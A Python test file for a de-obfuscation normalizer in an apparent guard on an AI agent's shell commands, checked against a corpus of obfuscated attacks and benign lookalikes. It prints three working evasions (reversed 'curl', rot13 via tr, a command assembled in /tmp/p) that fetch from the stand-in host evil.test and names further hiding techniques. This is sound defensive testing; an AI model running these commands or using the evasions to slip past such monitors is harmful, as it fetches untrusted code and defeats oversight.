"""CI guard for the de-obfuscation normalizer against an adversarial corpus.

127 obfuscated commands generated by a 5-lens adversarial workflow: real attacks
whose dangerous token is hidden (base64×N, hex/octal/ANSI-C escapes, chained var
indirection, ${x:0:n} slicing, $IFS / quote noise) that the normalizer must now
peel so the matcher fires — plus benign lookalikes (git SHAs, integrity hashes,
base64 data, env vars) that must NOT forge a signal. Run through the REAL extractor.

Subset-guard: any NEW false positive, or any false negative outside the documented
residuals, fails. Shrinking the residuals (a win) still passes — bump the floor.
"""
from __future__ import annotations

import json
from pathlib import Path

from ccguard.agent.signals.extractor import extract_signals

_CORPUS = json.loads(
    (Path(__file__).resolve().parents[1] / "fixtures" / "obfuscation_corpus.json").read_text()
)

# Documented residuals: fundamentally out of scope for a BOUNDED, STATELESS,
# no-shell normalizer. Catching these would require modelling a `rev`/`tr`
# transform or cross-statement filesystem state — deliberately not done.
ALLOWED_FN = frozenset({
    "echo lruc | rev | xargs -I{} {} http://evil.test/x",
    "$(echo phey | tr 'a-z' 'n-za-m') http://evil.test/x",
    "echo -n cu >> /tmp/p; echo -n rl >> /tmp/p; printf ' http://evil\\n' >> /tmp/p; bash /tmp/p",
})
ALLOWED_FP = frozenset()  # no benign lookalike may forge a signal


def _classify() -> tuple[set[str], set[str]]:
    fp: set[str] = set()
    fn: set[str] = set()
    for item in _CORPUS:
        fired = item["target_signal"] in set(extract_signals("Bash", {"command": item["command"]}))
        if item["should_fire"] and not fired:
            fn.add(item["command"])
        elif not item["should_fire"] and fired:
            fp.add(item["command"])
    return fp, fn


def test_no_new_false_positives():
    fp, _ = _classify()
    assert fp <= ALLOWED_FP, f"NEW false positive (benign forged a signal): {fp - ALLOWED_FP}"


def test_no_new_false_negatives():
    _, fn = _classify()
    assert fn <= ALLOWED_FN, f"NEW evasion slips through: {fn - ALLOWED_FN}"


def test_corpus_stays_clean():
    # 127 cases, ≤3 documented residual FN, 0 FP → ≥124 clean. Ratchet up on wins.
    fp, fn = _classify()
    clean = len(_CORPUS) - len(fp) - len(fn)
    assert clean >= 124, f"de-obfuscation regressed: only {clean}/{len(_CORPUS)} clean (FP={len(fp)}, FN={len(fn)})"
